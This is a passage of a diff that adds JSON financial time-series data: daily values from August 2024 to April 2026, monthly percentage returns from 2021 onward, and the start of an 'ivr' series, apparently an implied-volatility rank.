+ "2024-08-07", + 13675.181072254694 + ], + [ + "2024-08-08", + 14093.51674418163 + ], + [ + "2024-08-09", + 14167.119948826754 + ], + [ + "2024-08-12", + 14197.62953615622 + ], + [ + "2024-08-13", + 14549.911646312408 + ], + [ + "2024-08-14", + 14554.63211090224 + ], + [ + "2024-08-15", + 14922.325491535816 + ], + [ + "2024-08-16", + 14941.511583450392 + ], + [ + "2024-08-19", + 15137.78388914737 + ], + [ + "2024-08-20", + 15106.015705039948 + ], + [ + "2024-08-21", + 15176.471933291852 + ], + [ + "2024-08-22", + 14935.852257984629 + ], + [ + "2024-08-23", + 15097.839186018278 + ], + [ + "2024-08-26", + 14951.263528462017 + ], + [ + "2024-08-27", + 14995.92869618094 + ], + [ + "2024-08-28", + 14825.7623424356 + ], + [ + "2024-08-29", + 14804.06002586179 + ], + [ + "2024-08-30", + 14980.515487910205 + ], + [ + "2024-09-03", + 14525.694073976036 + ], + [ + "2024-09-04", + 14487.947797397504 + ], + [ + "2024-09-05", + 14501.47456384632 + ], + [ + "2024-09-06", + 14113.018696411536 + ], + [ + "2024-09-09", + 14294.50660777842 + ], + [ + "2024-09-10", + 14426.612762423241 + ], + [ + "2024-09-11", + 14739.892905912964 + ], + [ + "2024-09-12", + 14884.583090543976 + ], + [ + "2024-09-13", + 14951.263528462017 + ], + [ + "2024-09-16", + 14885.210935587944 + ], + [ + "2024-09-17", + 14893.074500984301 + ], + [ + "2024-09-18", + 14828.593458513491 + ], + [ + "2024-09-19", + 15203.521590602788 + ], + [ + "2024-09-20", + 15174.584522573257 + ], + [ + "2024-09-23", + 15214.809236840785 + ], + [ + "2024-09-24", + 15288.199284217893 + ], + [ + "2024-09-25", + 15302.37327364413 + ], + [ + "2024-09-26", + 15417.34061504398 + ], + [ + "2024-09-27", + 15331.666895649247 + ], + [ + "2024-09-30", + 15373.243220775315 + ], + [ + "2024-10-01", + 15159.056015598462 + ], + [ + "2024-10-02", + 15180.47638324049 + ], + [ + "2024-10-03", + 15169.136416582163 + ], + [ + "2024-10-04", + 15349.619582099363 + ], + [ + "2024-10-07", + 15185.200723417012 + ], + [ + "2024-10-08", + 15411.985523133473 + ], + [ + "2024-10-09", + 15533.253599596474 + ], + [ + "2024-10-10", + 15515.615804565015 + ], + [ + "2024-10-11", + 15539.867288284935 + ], + [ + "2024-10-14", + 15670.270122578993 + ], + [ + "2024-10-15", + 15460.808226475334 + ], + [ + "2024-10-16", + 15462.698543883946 + ], + [ + "2024-10-17", + 15473.407758808287 + ], + [ + "2024-10-18", + 15574.830893619215 + ], + [ + "2024-10-21", + 15604.754298461645 + ], + [ + "2024-10-22", + 15621.76231065579 + ], + [ + "2024-10-23", + 15382.3770097097 + ], + [ + "2024-10-24", + 15507.11082957127 + ], + [ + "2024-10-25", + 15601.603446481733 + ], + [ + "2024-10-28", + 15604.124515624331 + ], + [ + "2024-10-29", + 15754.054493461788 + ], + [ + "2024-10-30", + 15634.993563619402 + ], + [ + "2024-10-31", + 15240.322224028676 + ], + [ + "2024-11-01", + 15353.084356601257 + ], + [ + "2024-11-04", + 15308.358148391952 + ], + [ + "2024-11-05", + 15503.6450861727 + ], + [ + "2024-11-06", + 15924.774087207288 + ], + [ + "2024-11-07", + 16175.495479225014 + ], + [ + "2024-11-08", + 16194.39671551779 + ], + [ + "2024-11-11", + 16184.948035164749 + ], + [ + "2024-11-12", + 16155.65344426296 + ], + [ + "2024-11-13", + 16134.865766148261 + ], + [ + "2024-11-14", + 16022.733416412993 + ], + [ + "2024-11-15", + 15640.97746947055 + ], + [ + "2024-11-18", + 15749.645044703924 + ], + [ + "2024-11-19", + 15857.998697415313 + ], + [ + "2024-11-20", + 15848.863939584255 + ], + [ + "2024-11-21", + 15905.874788707859 + ], + [ + "2024-11-22", + 15931.388744792423 + ], + [ + "2024-11-25", + 15956.585871664985 + ], + [ + "2024-11-26", + 16042.260559956392 + ], + [ + "2024-11-27", + 15915.954220794887 + ], + [ + "2024-11-29", + 16055.804766545316 + ], + [ + "2024-12-02", + 16230.617948733352 + ], + [ + "2024-12-03", + 16280.386295227854 + ], + [ + "2024-12-04", + 16481.661014446443 + ], + [ + "2024-12-05", + 16435.98722529115 + ], + [ + "2024-12-06", + 16583.08124256735 + ], + [ + "2024-12-09", + 16453.93894284459 + ], + [ + "2024-12-10", + 16397.874705770304 + ], + [ + "2024-12-11", + 16691.43489527874 + ], + [ + "2024-12-12", + 16583.714900991356 + ], + [ + "2024-12-13", + 16710.651991886847 + ], + [ + "2024-12-16", + 16951.294920714216 + ], + [ + "2024-12-17", + 16876.643369869136 + ], + [ + "2024-12-18", + 16267.7867628949 + ], + [ + "2024-12-19", + 16195.342358670434 + ], + [ + "2024-12-20", + 16336.766392617472 + ], + [ + "2024-12-23", + 16495.93286243663 + ], + [ + "2024-12-24", + 16719.61428611015 + ], + [ + "2024-12-26", + 16708.25300372502 + ], + [ + "2024-12-27", + 16486.15088162815 + ], + [ + "2024-12-30", + 16266.885688989207 + ], + [ + "2024-12-31", + 16128.704552205994 + ], + [ + "2025-01-02", + 16097.156307643296 + ], + [ + "2025-01-03", + 16360.58962400802 + ], + [ + "2025-01-06", + 16548.61758791623 + ], + [ + "2025-01-07", + 16253.32016667348 + ], + [ + "2025-01-08", + 16256.160002821427 + ], + [ + "2025-01-10", + 16001.247163797214 + ], + [ + "2025-01-13", + 15949.822003992242 + ], + [ + "2025-01-14", + 15934.678148996543 + ], + [ + "2025-01-15", + 16301.27764528654 + ], + [ + "2025-01-16", + 16187.069918878156 + ], + [ + "2025-01-17", + 16460.28134046467 + ], + [ + "2025-01-21", + 16556.82220494141 + ], + [ + "2025-01-22", + 16768.514501185833 + ], + [ + "2025-01-23", + 16804.164085364446 + ], + [ + "2025-01-24", + 16709.202522464355 + ], + [ + "2025-01-27", + 16222.721440850119 + ], + [ + "2025-01-28", + 16462.49042487863 + ], + [ + "2025-01-29", + 16431.57293204992 + ], + [ + "2025-01-30", + 16501.608659145833 + ], + [ + "2025-01-31", + 16477.632342080986 + ], + [ + "2025-02-03", + 16345.757753740958 + ], + [ + "2025-02-04", + 16546.410441295615 + ], + [ + "2025-02-05", + 16621.49605785011 + ], + [ + "2025-02-06", + 16708.25300372502 + ], + [ + "2025-02-07", + 16497.508288426587 + ], + [ + "2025-02-10", + 16697.211457241912 + ], + [ + "2025-02-11", + 16657.461502344053 + ], + [ + "2025-02-12", + 16667.243483152535 + ], + [ + "2025-02-13", + 16907.012467181048 + ], + [ + "2025-02-14", + 16977.997713016295 + ], + [ + "2025-02-18", + 17016.48616444618 + ], + [ + "2025-02-19", + 17021.222131382776 + ], + [ + "2025-02-20", + 16948.971506492868 + ], + [ + "2025-02-21", + 16597.20775605662 + ], + [ + "2025-02-24", + 16401.283284265177 + ], + [ + "2025-02-25", + 16194.639908582662 + ], + [ + "2025-02-26", + 16233.760080643207 + ], + [ + "2025-02-27", + 15782.928583207588 + ], + [ + "2025-02-28", + 16032.166594419272 + ], + [ + "2025-03-03", + 15681.340735962285 + ], + [ + "2025-03-04", + 15634.017884669904 + ], + [ + "2025-03-05", + 15837.823361997818 + ], + [ + "2025-03-06", + 15402.135719557897 + ], + [ + "2025-03-07", + 15515.394896123618 + ], + [ + "2025-03-10", + 14914.07436747034 + ], + [ + "2025-03-11", + 14878.424783291726 + ], + [ + "2025-03-12", + 15046.264816125697 + ], + [ + "2025-03-13", + 14775.57446368178 + ], + [ + "2025-03-14", + 15132.707839478626 + ], + [ + "2025-03-17", + 15230.82316104865 + ], + [ + "2025-03-18", + 14971.178230674532 + ], + [ + "2025-03-19", + 15171.513120120515 + ], + [ + "2025-03-20", + 15120.088929212216 + ], + [ + "2025-03-21", + 15169.934787440541 + ], + [ + "2025-03-24", + 15502.828306277539 + ], + [ + "2025-03-25", + 15591.297292573272 + ], + [ + "2025-03-26", + 15304.406018863643 + ], + [ + "2025-03-27", + 15217.202411622575 + ], + [ + "2025-03-28", + 14816.566544114155 + ], + [ + "2025-03-31", + 14815.93579238017 + ], + [ + "2025-04-01", + 14935.367809648234 + ], + [ + "2025-04-02", + 15044.372560923739 + ], + [ + "2025-04-03", + 14238.99464180762 + ], + [ + "2025-04-04", + 13354.62645254567 + ], + [ + "2025-04-07", + 13386.853893675992 + ], + [ + "2025-04-08", + 13145.776899139213 + ], + [ + "2025-04-09", + 14723.675513403814 + ], + [ + "2025-04-10", + 14097.443682396446 + ], + [ + "2025-04-11", + 14357.162248917693 + ], + [ + "2025-04-14", + 14454.477261835993 + ], + [ + "2025-04-15", + 14470.590982401154 + ], + [ + "2025-04-16", + 14034.253210293791 + ], + [ + "2025-04-17", + 14031.725358874482 + ], + [ + "2025-04-21", + 13684.486355900164 + ], + [ + "2025-04-22", + 14043.73192644369 + ], + [ + "2025-04-23", + 14362.216982859636 + ], + [ + "2025-04-24", + 14766.329251630023 + ], + [ + "2025-04-25", + 14930.942858543605 + ], + [ + "2025-04-28", + 14926.204953813665 + ], + [ + "2025-04-29", + 15024.783407993282 + ], + [ + "2025-04-30", + 15022.888246101305 + ], + [ + "2025-05-01", + 15219.097573514551 + ], + [ + "2025-05-02", + 15445.008428432157 + ], + [ + "2025-05-05", + 15353.379870086459 + ], + [ + "2025-05-06", + 15210.567407207312 + ], + [ + "2025-05-07", + 15270.282446944671 + ], + [ + "2025-05-08", + 15427.94809581768 + ], + [ + "2025-05-09", + 15417.835721243777 + ], + [ + "2025-05-12", + 16045.962714143121 + ], + [ + "2025-05-13", + 16290.51707883854 + ], + [ + "2025-05-14", + 16388.145045382153 + ], + [ + "2025-05-15", + 16406.152958942617 + ], + [ + "2025-05-16", + 16477.562581520542 + ], + [ + "2025-05-19", + 16493.359472873704 + ], + [ + "2025-05-20", + 16438.382337866286 + ], + [ + "2025-05-21", + 16209.942662632699 + ], + [ + "2025-05-22", + 16240.27687966439 + ], + [ + "2025-05-23", + 16089.878924733976 + ], + [ + "2025-05-27", + 16468.398756789302 + ], + [ + "2025-05-28", + 16395.409832634727 + ], + [ + "2025-05-29", + 16427.639211558395 + ], + [ + "2025-05-30", + 16401.730914528005 + ], + [ + "2025-06-02", + 16531.2743374733 + ], + [ + "2025-06-03", + 16660.501900103263 + ], + [ + "2025-06-04", + 16706.9469310101 + ], + [ + "2025-06-05", + 16581.19383184876 + ], + [ + "2025-06-06", + 16743.28249403305 + ], + [ + "2025-06-09", + 16767.929287595467 + ], + [ + "2025-06-10", + 16878.827262969604 + ], + [ + "2025-06-11", + 16821.95302827686 + ], + [ + "2025-06-12", + 16861.451070039795 + ], + [ + "2025-06-13", + 16649.760711588722 + ], + [ + "2025-06-16", + 16881.35802107893 + ], + [ + "2025-06-17", + 16716.742476372 + ], + [ + "2025-06-18", + 16713.897795740693 + ], + [ + "2025-06-20", + 16645.652589696096 + ], + [ + "2025-06-23", + 16816.810124737694 + ], + [ + "2025-06-24", + 17073.972741836125 + ], + [ + "2025-06-25", + 17117.62153694529 + ], + [ + "2025-06-26", + 17277.67745391007 + ], + [ + "2025-06-27", + 17336.828595783867 + ], + [ + "2025-06-30", + 17449.11984457347 + ], + [ + "2025-07-01", + 17302.03357847065 + ], + [ + "2025-07-02", + 17422.548822218894 + ], + [ + "2025-07-03", + 17593.98927508895 + ], + [ + "2025-07-07", + 17461.45777480477 + ], + [ + "2025-07-08", + 17471.263009133403 + ], + [ + "2025-07-09", + 17594.940731621627 + ], + [ + "2025-07-10", + 17569.635088321713 + ], + [ + "2025-07-11", + 17530.096352898523 + ], + [ + "2025-07-14", + 17593.677290360312 + ], + [ + "2025-07-15", + 17609.805544375566 + ], + [ + "2025-07-16", + 17627.83477366283 + ], + [ + "2025-07-17", + 17770.493181971004 + ], + [ + "2025-07-18", + 17753.41347142307 + ], + [ + "2025-07-21", + 17845.460593131414 + ], + [ + "2025-07-22", + 17753.09761110774 + ], + [ + "2025-07-23", + 17834.074119432793 + ], + [ + "2025-07-24", + 17872.029677692648 + ], + [ + "2025-07-25", + 17915.048689964497 + ], + [ + "2025-07-28", + 17971.03735309831 + ], + [ + "2025-07-29", + 17943.202889482414 + ], + [ + "2025-07-30", + 17967.24121593432 + ], + [ + "2025-07-31", + 17872.029677692648 + ], + [ + "2025-08-01", + 17519.975258254563 + ], + [ + "2025-08-04", + 17843.245695337417 + ], + [ + "2025-08-05", + 17722.098730958514 + ], + [ + "2025-08-06", + 17945.099989167735 + ], + [ + "2025-08-07", + 18005.83043261818 + ], + [ + "2025-08-08", + 18173.794484226266 + ], + [ + "2025-08-11", + 18120.02071888645 + ], + [ + "2025-08-12", + 18347.7637574123 + ], + [ + "2025-08-13", + 18356.93920890362 + ], + [ + "2025-08-14", + 18342.708054573686 + ], + [ + "2025-08-15", + 18262.04546877062 + ], + [ + "2025-08-18", + 18254.76905475797 + ], + [ + "2025-08-19", + 18007.09581167284 + ], + [ + "2025-08-20", + 17900.183877210562 + ], + [ + "2025-08-21", + 17817.31026920019 + ], + [ + "2025-08-22", + 18092.18431747721 + ], + [ + "2025-08-25", + 18039.993729300735 + ], + [ + "2025-08-26", + 18112.428444558474 + ], + [ + "2025-08-27", + 18140.26678376106 + ], + [ + "2025-08-28", + 18253.823411605328 + ], + [ + "2025-08-29", + 18042.52448741006 + ], + [ + "2025-09-02", + 17891.328161621266 + ], + [ + "2025-09-03", + 18032.085594657427 + ], + [ + "2025-09-04", + 18195.30399036219 + ], + [ + "2025-09-05", + 18221.557214608092 + ], + [ + "2025-09-08", + 18310.441857576454 + ], + [ + "2025-09-09", + 18362.318523230944 + ], + [ + "2025-09-10", + 18368.327620395587 + ], + [ + "2025-09-11", + 18475.239554857864 + ], + [ + "2025-09-12", + 18556.847783813573 + ], + [ + "2025-09-15", + 18715.63832172369 + ], + [ + "2025-09-16", + 18699.82399023042 + ], + [ + "2025-09-17", + 18662.49821480788 + ], + [ + "2025-09-18", + 18830.778126731297 + ], + [ + "2025-09-19", + 18958.25004859017 + ], + [ + "2025-09-22", + 19070.483163579407 + ], + [ + "2025-09-23", + 18943.81155037226 + ], + [ + "2025-09-24", + 18877.308420545338 + ], + [ + "2025-09-25", + 18795.92303782437 + ], + [ + "2025-09-26", + 18873.190609685982 + ], + [ + "2025-09-29", + 18960.594778538318 + ], + [ + "2025-09-30", + 19012.531515786523 + ], + [ + "2025-10-01", + 19103.733759596194 + ], + [ + "2025-10-02", + 19182.270586099163 + ], + [ + "2025-10-03", + 19101.518861802197 + ], + [ + "2025-10-06", + 19244.973703175405 + ], + [ + "2025-10-07", + 19143.636800168355 + ], + [ + "2025-10-08", + 19363.097709935202 + ], + [ + "2025-10-09", + 19339.66203721377 + ], + [ + "2025-10-10", + 18668.299968084542 + ], + [ + "2025-10-13", + 19064.466315241385 + ], + [ + "2025-10-14", + 18937.476903925563 + ], + [ + "2025-10-15", + 19071.114884210067 + ], + [ + "2025-10-16", + 19000.495881317132 + ], + [ + "2025-10-17", + 19125.268457045615 + ], + [ + "2025-10-20", + 19366.260188675187 + ], + [ + "2025-10-21", + 19361.19673466319 + ], + [ + "2025-10-22", + 19174.670560597802 + ], + [ + "2025-10-23", + 19335.86202446309 + ], + [ + "2025-10-24", + 19542.33584322787 + ], + [ + "2025-10-27", + 19890.369341473874 + ], + [ + "2025-10-28", + 20043.325183620454 + ], + [ + "2025-10-29", + 20133.579846484135 + ], + [ + "2025-10-30", + 19825.76524912562 + ], + [ + "2025-10-31", + 19921.40310190332 + ], + [ + "2025-11-03", + 20016.723156572345 + ], + [ + "2025-11-04", + 19610.424088011474 + ], + [ + "2025-11-05", + 19738.047157751298 + ], + [ + "2025-11-06", + 19370.37993732789 + ], + [ + "2025-11-07", + 19309.259997414985 + ], + [ + "2025-11-10", + 19736.462042794617 + ], + [ + "2025-11-11", + 19683.893584915753 + ], + [ + "2025-11-12", + 19668.375735804355 + ], + [ + "2025-11-13", + 19266.826198733495 + ], + [ + "2025-11-14", + 19281.392591312215 + ], + [ + "2025-11-17", + 19116.718912804918 + ], + [ + "2025-11-18", + 18883.958927307365 + ], + [ + "2025-11-19", + 18996.6978063598 + ], + [ + "2025-11-20", + 18547.011544791414 + ], + [ + "2025-11-21", + 18686.350513098612 + ], + [ + "2025-11-24", + 19164.220041085093 + ], + [ + "2025-11-25", + 19282.342110051548 + ], + [ + "2025-11-26", + 19452.716776581536 + ], + [ + "2025-11-28", + 19610.424088011474 + ], + [ + "2025-12-01", + 19544.55267881521 + ], + [ + "2025-12-02", + 19697.510458755136 + ], + [ + "2025-12-03", + 19745.64718325266 + ], + [ + "2025-12-04", + 19727.27884012992 + ], + [ + "2025-12-05", + 19807.714704111553 + ], + [ + "2025-12-08", + 19769.71457660475 + ], + [ + "2025-12-09", + 19794.09783027217 + ], + [ + "2025-12-10", + 19875.167352677807 + ], + [ + "2025-12-11", + 19810.882996231572 + ], + [ + "2025-12-12", + 19432.133535664794 + ], + [ + "2025-12-15", + 19334.59470761508 + ], + [ + "2025-12-16", + 19372.91263323056 + ], + [ + "2025-12-17", + 19013.796894841187 + ], + [ + "2025-12-18", + 19289.31041492225 + ], + [ + "2025-12-19", + 19540.75266606453 + ], + [ + "2025-12-22", + 19634.421720803122 + ], + [ + "2025-12-23", + 19726.37582843088 + ], + [ + "2025-12-24", + 19784.08718984891 + ], + [ + "2025-12-26", + 19782.817935207553 + ], + [ + "2025-12-29", + 19687.05800144908 + ], + [ + "2025-12-30", + 19641.39583905386 + ], + [ + "2025-12-31", + 19479.04751256126 + ], + [ + "2026-01-02", + 19441.314800536147 + ], + [ + "2026-01-05", + 19595.735614451984 + ], + [ + "2026-01-06", + 19767.91436658671 + ], + [ + "2026-01-07", + 19786.941559446946 + ], + [ + "2026-01-08", + 19674.373206208922 + ], + [ + "2026-01-09", + 19870.334496073934 + ], + [ + "2026-01-12", + 19886.823179651463 + ], + [ + "2026-01-13", + 19857.333840518444 + ], + [ + "2026-01-14", + 19645.201665184577 + ], + [ + "2026-01-15", + 19715.913682158098 + ], + [ + "2026-01-16", + 19699.424998580565 + ], + [ + "2026-01-20", + 19280.867449315563 + ], + [ + "2026-01-21", + 19541.51421884934 + ], + [ + "2026-01-22", + 19683.56997342704 + ], + [ + "2026-01-23", + 19745.718881606444 + ], + [ + "2026-01-26", + 19832.60178404882 + ], + [ + "2026-01-27", + 20012.39025065163 + ], + [ + "2026-01-28", + 20078.660845277085 + ], + [ + "2026-01-29", + 19958.484715364317 + ], + [ + "2026-01-30", + 19718.76611396279 + ], + [ + "2026-02-02", + 19854.16361060508 + ], + [ + "2026-02-03", + 19549.12393331743 + ], + [ + "2026-02-04", + 19207.620798646025 + ], + [ + "2026-02-05", + 18931.120941752062 + ], + [ + "2026-02-06", + 19331.284956580832 + ], + [ + "2026-02-09", + 19479.365310669935 + ], + [ + "2026-02-10", + 19388.994380205517 + ], + [ + "2026-02-11", + 19440.997002427473 + ], + [ + "2026-02-12", + 19045.588332468753 + ], + [ + "2026-02-13", + 19086.175414091904 + ], + [ + "2026-02-17", + 19066.51456280766 + ], + [ + "2026-02-18", + 19208.888115494035 + ], + [ + "2026-02-19", + 19135.323666715823 + ], + [ + "2026-02-20", + 19304.64998704585 + ], + [ + "2026-02-23", + 19070.002590829703 + ], + [ + "2026-02-24", + 19274.842849804158 + ], + [ + "2026-02-25", + 19554.197076296157 + ], + [ + "2026-02-26", + 19318.284301025345 + ], + [ + "2026-02-27", + 19256.451253161267 + ], + [ + "2026-03-02", + 19281.818905848242 + ], + [ + "2026-03-03", + 19075.39546971045 + ], + [ + "2026-03-04", + 19366.165236801255 + ], + [ + "2026-03-05", + 19307.818279165873 + ], + [ + "2026-03-06", + 19017.366310183745 + ], + [ + "2026-03-09", + 19271.354821782115 + ], + [ + "2026-03-10", + 19271.67261989079 + ], + [ + "2026-03-11", + 19269.136048401426 + ], + [ + "2026-03-12", + 18938.41285811148 + ], + [ + "2026-03-13", + 18826.162302982128 + ], + [ + "2026-03-16", + 19037.343021783316 + ], + [ + "2026-03-17", + 19130.250523737097 + ], + [ + "2026-03-18", + 18863.581092485256 + ], + [ + "2026-03-19", + 18803.966818001867 + ], + [ + "2026-03-20", + 18456.437146025713 + ], + [ + "2026-03-23", + 18668.298030291196 + ], + [ + "2026-03-24", + 18540.66720937799 + ], + [ + "2026-03-25", + 18662.583477715085 + ], + [ + "2026-03-26", + 18217.146796953555 + ], + [ + "2026-03-27", + 17861.243919931156 + ], + [ + "2026-03-30", + 17724.724440941776 + ], + [ + "2026-03-31", + 18324.7757149537 + ], + [ + "2026-04-01", + 18551.144857997533 + ], + [ + "2026-04-02", + 18572.416015551953 + ], + [ + "2026-04-06", + 18684.17243337818 + ], + [ + "2026-04-07", + 18687.03067856291 + ], + [ + "2026-04-08", + 19242.63478660729 + ], + [ + "2026-04-09", + 19372.804116803207 + ], + [ + "2026-04-10", + 19400.743221259763 + ], + [ + "2026-04-13", + 19601.395908814422 + ], + [ + "2026-04-14", + 19957.298785836825 + ], + [ + "2026-04-15", + 20236.68983040239 + ], + [ + "2026-04-16", + 20334.156960098317 + ], + [ + "2026-04-17", + 20600.212110859607 + ], + [ + "2026-04-20", + 20534.809647652975 + ], + [ + "2026-04-21", + 20456.708824652764 + ], + [ + "2026-04-22", + 20798.959947555562 + ], + [ + "2026-04-23", + 20681.8067752619 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + 0.706645248526927 + ], + [ + "2021-06-30", + 0.6197277330461715 + ], + [ + "2021-07-31", + 0.24662697723030202 + ], + [ + "2021-08-31", + 0.25838627887411203 + ], + [ + "2021-09-30", + -1.0460284895277616 + ], + [ + "2021-10-31", + 0.699921389279945 + ], + [ + "2021-11-30", + -0.1313801479228105 + ], + [ + "2021-12-31", + 1.802604073466374 + ], + [ + "2022-01-31", + -6.417407277996645 + ], + [ + "2022-02-28", + 1.5644610451498453 + ], + [ + "2022-03-31", + -0.051762517704412314 + ], + [ + "2022-04-30", + -5.541356011584653 + ], + [ + "2022-05-31", + 0.49702147708761135 + ], + [ + "2022-06-30", + 0.7947114854790938 + ], + [ + "2022-07-31", + 2.5354622898340784 + ], + [ + "2022-08-31", + -1.5250935147411604 + ], + [ + "2022-09-30", + 0.9700538733065089 + ], + [ + "2022-10-31", + 0.9714181656709897 + ], + [ + "2022-11-30", + 0.7954860183527979 + ], + [ + "2022-12-31", + -0.7018033780932686 + ], + [ + "2023-01-31", + 0.74285069051645 + ], + [ + "2023-02-28", + -0.2328994745275259 + ], + [ + "2023-03-31", + 0.7179894299630396 + ], + [ + "2023-04-30", + 0.22311251152480338 + ], + [ + "2023-05-31", + 0.25838627887411203 + ], + [ + "2023-06-30", + 0.24662697723027982 + ], + [ + "2023-07-31", + 0.2348690548344745 + ], + [ + "2023-08-31", + 0.2701469599276418 + ], + [ + "2023-09-30", + 0.2348690548344523 + ], + [ + "2023-10-31", + 0.3204866322285671 + ], + [ + "2023-11-30", + 0.5277193203648833 + ], + [ + "2023-12-31", + 0.2348690548344301 + ], + [ + "2024-01-31", + 0.3475093730222589 + ], + [ + "2024-02-29", + 0.7023132361777096 + ], + [ + "2024-03-31", + 0.822830405315278 + ], + [ + "2024-04-30", + 0.675919244492218 + ], + [ + "2024-05-31", + 0.7996706438484935 + ], + [ + "2024-06-30", + 0.3371104660279567 + ], + [ + "2024-07-31", + 0.9111457058388561 + ], + [ + "2024-08-31", + 3.462369623441486 + ], + [ + "2024-09-30", + 1.341016366510872 + ], + [ + "2024-10-31", + 0.6782299455278196 + ], + [ + "2024-11-30", + 0.7862496290612642 + ], + [ + "2024-12-31", + -0.6199515413415346 + ], + [ + "2025-01-31", + 3.067594178093569 + ], + [ + "2025-02-28", + -0.07921263020403968 + ], + [ + "2025-03-31", + -4.049658830140867 + ], + [ + "2025-04-30", + -1.369849329822459 + ], + [ + "2025-05-31", + 2.5221604596587843 + ], + [ + "2025-06-30", + 0.48907531953661376 + ], + [ + "2025-07-31", + 0.2583862788740676 + ], + [ + "2025-08-31", + 0.24662697723027982 + ], + [ + "2025-09-30", + 0.24662697723025762 + ], + [ + "2025-10-31", + 1.148504310322429 + ], + [ + "2025-11-30", + 2.10834193830276 + ], + [ + "2025-12-31", + 1.4402379266319043 + ], + [ + "2026-01-31", + 0.2348690548344523 + ], + [ + "2026-02-28", + 1.0565244935238471 + ], + [ + "2026-03-31", + 1.125617429584569 + ], + [ + "2026-04-30", + 1.1452662354961118 + ] + ], + "ivr": [ + [ + "2021-04-01", + 50.0 + ], + [ + "2021-04-05", + 50.0 + ], + [ + "2021-04-06", + 50.0 + ], + [ + "2021-04-07", + 50.0 + ], + [ + "2021-04-08", + 50.0 + ], + [ + "2021-04-09", + 50.0 + ], + [ + "2021-04-12", + 50.0 + ], + [ + "2021-04-13", + 50.0 + ], + [ + "2021-04-14", + 50.0 + ], + [ + "2021-04-15", + 50.0 + ], + [ + "2021-04-16", + 50.0 + ], + [ + "2021-04-19", + 50.0 + ], + [ + "2021-04-20", + 50.0 + ], + [ + "2021-04-21", + 50.0 + ], + [ + "2021-04-22", + 50.0 + ], + [ + "2021-04-23", + 50.0 + ], + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 0.0 + ], + [ + "2021-05-04", + 100.0 + ], + [ + "2021-05-05", + 100.0 + ], + [ + "2021-05-06", + 83.03019088941541 + ], + [ + "2021-05-07", + 92.46826896652158 + ], + [ + "2021-05-10", + 100.0 + ], + [ + "2021-05-11", + 81.60129556125598 + ], + [ + "2021-05-12", + 100.0 + ], + [ + "2021-05-13", + 83.1588340060907 + ], + [ + "2021-05-14", + 100.0 + ], + [ + "2021-05-17", + 98.0063458630961 + ], + [ + "2021-05-18", + 97.83777447955939 + ], + [ + "2021-05-19", + 91.98390253525857 + ], + [ + "2021-05-20", + 100.0 + ], + [ + "2021-05-21", + 91.1818018813409 + ], + [ + "2021-05-24", + 100.0 + ], + [ + "2021-05-25", + 99.88530013528766 + ], + [ + "2021-05-26", + 100.0 + ], + [ + "2021-05-27", + 99.60517024846243 + ], + [ + "2021-05-28", + 98.99426678960053 + ], + [ + "2021-06-01", + 98.21413241948663 + ], + [ + "2021-06-02", + 83.65121516085425 + ], + [ + "2021-06-03", + 88.45040740960263 + ], + [ + "2021-06-04", + 99.29396751750357 + ], + [ + "2021-06-07", + 96.8699781246447 + ], + [ + "2021-06-08", + 63.19725340956908 + ], + [ + "2021-06-09", + 62.68361170220877 + ], + [ + "2021-06-10", + 20.418638794046302 + ], + [ + "2021-06-11", + 19.63912736891603 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.665984084588787 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 5.677904963144019 + ], + [ + "2021-06-18", + 0.0 + ], + [ + "2021-06-21", + 0.0 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.15692467134740387 + ], + [ + "2021-06-24", + 1.045135741820762 + ], + [ + "2021-06-25", + 0.0 + ], + [ + "2021-06-28", + 5.278503452579093 + ], + [ + "2021-06-29", + 2.7401279926647133 + ], + [ + "2021-06-30", + 3.9921722625588867 + ], + [ + "2021-07-01", + 0.0 + ], + [ + "2021-07-02", + 0.0 + ], + [ + "2021-07-06", + 0.06095470659091914 + ], + [ + "2021-07-07", + 0.0 + ], + [ + "2021-07-08", + 4.739859932452854 + ], + [ + "2021-07-09", + 1.980244669484471 + ], + [ + "2021-07-12", + 2.0551217043091135 + ], + [ + "2021-07-13", + 0.0 + ], + [ + "2021-07-14", + 0.0 + ], + [ + "2021-07-15", + 3.485999613730507 + ], + [ + "2021-07-16", + 3.952448527572875 + ], + [ + "2021-07-19", + 3.9946362427904156 + ], + [ + "2021-07-20", + 7.958830951201584 + ], + [ + "2021-07-21", + 6.635982250368182 + ], + [ + "2021-07-22", + 7.93415305997673 + ], + [ + "2021-07-23", + 11.522579694337107 + ], + [ + "2021-07-26", + 10.846036638984371 + ], + [ + "2021-07-27", + 15.001406444207301 + ], + [ + "2021-07-28", + 14.974812516830887 + ], + [ + "2021-07-29", + 14.46157228496693 + ], + [ + "2021-07-30", + 16.69910090432632 + ], + [ + "2021-08-02", + 10.955898344580062 + ], + [ + "2021-08-03", + 11.61079560148543 + ], + [ + "2021-08-04", + 11.555934784142318 + ], + [ + "2021-08-05", + 10.263455963600206 + ], + [ + "2021-08-06", + 10.926502516275834 + ], + [ + "2021-08-09", + 10.351686681736707 + ], + [ + "2021-08-10", + 12.184700436023583 + ], + [ + "2021-08-11", + 12.398097289217699 + ], + [ + "2021-08-12", + 9.514883391909947 + ], + [ + "2021-08-13", + 4.414104072086804 + ], + [ + "2021-08-16", + 0.0 + ], + [ + "2021-08-17", + 0.8995728832051325 + ], + [ + "2021-08-18", + 4.382283413829925 + ], + [ + "2021-08-19", + 2.724147498730146 + ], + [ + "2021-08-20", + 1.6620374453031574 + ], + [ + "2021-08-23", + 14.265454833917069 + ], + [ + "2021-08-24", + 6.378478477186166 + ], + [ + "2021-08-25", + 6.07703692329414 + ], + [ + "2021-08-26", + 8.703151904955092 + ], + [ + "2021-08-27", + 10.769626427671742 + ], + [ + "2021-08-30", + 15.36345060558558 + ], + [ + "2021-08-31", + 14.991135025163846 + ], + [ + "2021-09-01", + 14.990604347475681 + ], + [ + "2021-09-02", + 14.02309063387798 + ], + [ + "2021-09-03", + 12.126251248271675 + ], + [ + "2021-09-07", + 12.136715146605235 + ], + [ + "2021-09-08", + 11.05743967142535 + ], + [ + "2021-09-09", + 11.969001017420378 + ], + [ + "2021-09-10", + 16.265376952127575 + ], + [ + "2021-09-13", + 16.189540330548972 + ], + [ + "2021-09-14", + 